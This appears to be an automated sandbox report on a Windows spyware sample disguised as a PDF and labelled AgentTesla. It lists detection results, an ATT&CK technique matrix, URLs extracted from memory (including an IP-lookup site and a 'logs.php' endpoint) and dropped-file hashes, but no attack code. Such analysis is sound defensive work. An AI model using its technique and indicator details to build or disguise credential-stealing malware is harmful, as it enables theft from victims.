              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncVirtualization/Sandbox Evasion14Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              5O857649056366403032021.PDF.exe24%ReversingLabsWin32.Trojan.AgentTesla
              5O857649056366403032021.PDF.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              7.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
              2.2.5O857649056366403032021.PDF.exe.400000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
              2.2.5O857649056366403032021.PDF.exe.400000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
              0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack100%AviraTR/Inject.vcoldiDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.founder.com.cn/cnO0%Avira URL Cloudsafe
              http://www.carterandcone.comadeh0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.carterandcone.com/0%Avira URL Cloudsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.carterandcone.com0%URL Reputationsafe
              http://www.fontbureau.comceTF0%Avira URL Cloudsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.founder.com.cn/cnr-c0%Avira URL Cloudsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.monotype.t0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/X0%Avira URL Cloudsafe
              http://www.carterandcone.comht0%Avira URL Cloudsafe
              http://www.carterandcone.comTC10%Avira URL Cloudsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.carterandcone.comTC/0%Avira URL Cloudsafe
              http://www.carterandcone.comitk0%Avira URL Cloudsafe
              http://www.goodfont.co.krny0%Avira URL Cloudsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.carterandcone.comTC30%Avira URL Cloudsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htmR0%Avira URL Cloudsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.carterandcone.commpa0%Avira URL Cloudsafe
              http://www.carterandcone.comb0%Avira URL Cloudsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.galapagosdesign.com/0%URL Reputationsafe
              http://www.carterandcone.comf0%Avira URL Cloudsafe
              http://www.carterandcone.comsof0%Avira URL Cloudsafe
              http://www.carterandcone.comTC0%URL Reputationsafe
              http://www.carterandcone.comTC0%URL Reputationsafe
              http://www.carterandcone.comTC0%URL Reputationsafe
              http://www.sandoll.co.krn0%Avira URL Cloudsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.coma0%URL Reputationsafe
              http://www.fontbureau.come.com0%URL Reputationsafe
              http://www.fontbureau.come.com0%URL Reputationsafe
              http://www.fontbureau.come.com0%URL Reputationsafe
              http://www.sakkal.com80%Avira URL Cloudsafe
              http://en.w0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://en.w0%URL Reputationsafe
              http://www.carterandcone.comn0%Avira URL Cloudsafe
              http://www.goodfont.co.krF0%Avira URL Cloudsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.carterandcone.comghtv0%Avira URL Cloudsafe
              http://www.monotype.0%URL Reputationsafe
              http://www.monotype.0%URL Reputationsafe
              http://www.monotype.0%URL Reputationsafe
              http://www.monotype.-0%Avira URL Cloudsafe
              http://www.galapagosdesign.com/90%Avira URL Cloudsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.agfamonotype.00%Avira URL Cloudsafe
              http://www.sandoll.co.krn-u0%Avira URL Cloudsafe
              http://www.carterandcone.comark0%Avira URL Cloudsafe
              http://www.founder.com.cn/cn&0%Avira URL Cloudsafe
              http://www.carterandcone.comies0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              203.215.12.0.in-addr.arpa
              unknown
              unknownfalse
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.founder.com.cn/cnO5O857649056366403032021.PDF.exe, 00000002.00000003.222841537.000000000626E000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.fontbureau.com/designersG5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                  high
                  http://www.carterandcone.comadeh5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designers/?5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/bThe5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers?5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designersW5O857649056366403032021.PDF.exe, 00000002.00000003.232516116.0000000006268000.00000004.00000001.sdmpfalse
                        high
                        http://www.tiro.com5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.com/5O857649056366403032021.PDF.exe, 00000002.00000003.223882735.0000000006268000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.243602370.0000000006268000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.243672472.0000000006268000.00000004.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/O5O857649056366403032021.PDF.exe, 00000002.00000003.229591196.0000000006278000.00000004.00000001.sdmpfalse
                            high
                            http://www.goodfont.co.kr5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.com5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000003.224185573.0000000006268000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.comceTF5O857649056366403032021.PDF.exe, 00000002.00000002.772908055.00000000014F7000.00000004.00000040.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmpfalse
                              high
                              http://www.sajatypeworks.com5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netD5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cn/cThe5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.founder.com.cn/cnr-c5O857649056366403032021.PDF.exe, 00000002.00000003.223199362.0000000006265000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htm5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.com5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.monotype.t5O857649056366403032021.PDF.exe, 00000002.00000003.240555318.0000000006268000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn/X5O857649056366403032021.PDF.exe, 00000002.00000003.223388192.0000000006265000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.carterandcone.comht5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://whatismyipaddress.com/-5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpfalse
                                high
                                http://www.carterandcone.comTC15O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.galapagosdesign.com/DPlease5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.carterandcone.comTC/5O857649056366403032021.PDF.exe, 00000002.00000003.224185573.0000000006268000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.carterandcone.comitk5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://login.yahoo.com/config/loginvbc.exefalse
                                  high
                                  http://www.fonts.com5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krny5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sandoll.co.kr5O857649056366403032021.PDF.exe, 00000002.00000003.222273989.000000000626E000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.site.com/logs.php5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.carterandcone.comTC35O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.urwpp.deDPlease5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.nirsoft.net/vbc.exe, vbc.exe, 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmpfalse
                                        high
                                        http://www.zhongyicts.com.cn5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmR5O857649056366403032021.PDF.exe, 00000002.00000003.236539415.0000000006268000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name5O857649056366403032021.PDF.exe, 00000000.00000002.218552903.00000000027D1000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.sakkal.com5O857649056366403032021.PDF.exe, 00000002.00000003.227490771.0000000006268000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.commpa5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.com/designerst5O857649056366403032021.PDF.exe, 00000002.00000003.233214847.0000000006268000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designersr5O857649056366403032021.PDF.exe, 00000002.00000003.232557212.0000000006268000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.carterandcone.comb5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.05O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.fontbureau.com5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.galapagosdesign.com/5O857649056366403032021.PDF.exe, 00000002.00000003.235768370.0000000006278000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comf5O857649056366403032021.PDF.exe, 00000002.00000003.227770906.0000000006268000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.comsof5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.comTC5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sandoll.co.krn5O857649056366403032021.PDF.exe, 00000002.00000003.222652479.000000000626E000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.coma5O857649056366403032021.PDF.exe, 00000002.00000002.772908055.00000000014F7000.00000004.00000040.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.come.com5O857649056366403032021.PDF.exe, 00000002.00000002.772908055.00000000014F7000.00000004.00000040.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sakkal.com85O857649056366403032021.PDF.exe, 00000002.00000003.227490771.0000000006268000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://en.w5O857649056366403032021.PDF.exe, 00000002.00000003.224554700.0000000006268000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comn5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.goodfont.co.krF5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.coml5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlN5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cn5O857649056366403032021.PDF.exe, 00000002.00000003.222841537.000000000626E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.html5O857649056366403032021.PDF.exe, 00000002.00000003.231534012.0000000006268000.00000004.00000001.sdmp, 5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.carterandcone.comghtv5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.monotype.5O857649056366403032021.PDF.exe, 00000002.00000003.238156321.0000000006268000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.monotype.-5O857649056366403032021.PDF.exe, 00000002.00000003.234952955.0000000006268000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://www.galapagosdesign.com/95O857649056366403032021.PDF.exe, 00000002.00000003.235768370.0000000006278000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/5O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers85O857649056366403032021.PDF.exe, 00000002.00000002.782376344.0000000007452000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.agfamonotype.05O857649056366403032021.PDF.exe, 00000002.00000003.243737730.0000000006268000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        http://www.sandoll.co.krn-u5O857649056366403032021.PDF.exe, 00000002.00000003.222340087.000000000626E000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers:5O857649056366403032021.PDF.exe, 00000002.00000003.231609808.0000000006268000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.carterandcone.comark5O857649056366403032021.PDF.exe, 00000002.00000003.224323142.0000000006268000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cn&5O857649056366403032021.PDF.exe, 00000002.00000003.223199362.0000000006265000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/5O857649056366403032021.PDF.exe, 00000002.00000003.229567284.0000000006268000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.carterandcone.comies5O857649056366403032021.PDF.exe, 00000002.00000003.224083852.0000000006268000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious

                                                            Private

                                                            IP
                                                            192.168.2.1

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:362120
                                                            Start date:03.03.2021
                                                            Start time:17:13:51
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 14m 9s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Sample file name:5O857649056366403032021.PDF.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:35
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@8/7@1/1
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HDC Information:
                                                            • Successful, ratio: 4.1% (good quality ratio 3.9%)
                                                            • Quality average: 85.1%
                                                            • Quality standard deviation: 23.6%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 64
                                                            • Number of non-executed functions: 303
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 168.61.161.212, 131.253.33.200, 13.107.22.200, 51.11.168.160, 184.30.21.219, 104.43.193.48, 40.88.32.150, 23.211.6.115, 104.42.151.234, 52.255.188.83, 184.30.20.56, 8.248.135.254, 8.241.122.254, 8.241.11.126, 8.241.123.254, 8.248.131.254, 2.20.142.209, 2.20.142.210, 51.104.139.180, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156
                                                            • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Execution Graph export aborted for target vbc.exe, PID 6732 because there are no executed function
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            17:14:43API Interceptor6x Sleep call for process: 5O857649056366403032021.PDF.exe modified
                                                            17:15:12API Interceptor1x Sleep call for process: WerFault.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            No context

                                                            Domains

                                                            No context

                                                            ASN

                                                            No context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_vbc.exe_29b1fd91934ca85fd856bebf7e23b59544bb3f14_6c16ead4_1afe9588\Report.wer
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):10936
                                                            Entropy (8bit):3.773645507675144
                                                            Encrypted:false
                                                            SSDEEP:192:+oRmKDX5HBUZMXQf9jU3//u7swS274ItE7GDBh:NbDZBUZMXojM/u7swX4ItEOn
                                                            MD5:B990CB6AF75858E6F2C29C7A53953022
                                                            SHA1:43D20E7FF25881476A44DBA8066C662B9D6F9D65
                                                            SHA-256:840F9558BFC0DF3028B17747557F6164B8E047E9731644A87B3141550915A256
                                                            SHA-512:B71B19F6D1A887457695FDBF710EC4A5ED4592B19D9573FBA4F01DF34C7704113E762817D7E0284146318D75CB699EA51A259192A717D09A17956343104F77E3
                                                            Malicious:false
                                                            Reputation:low
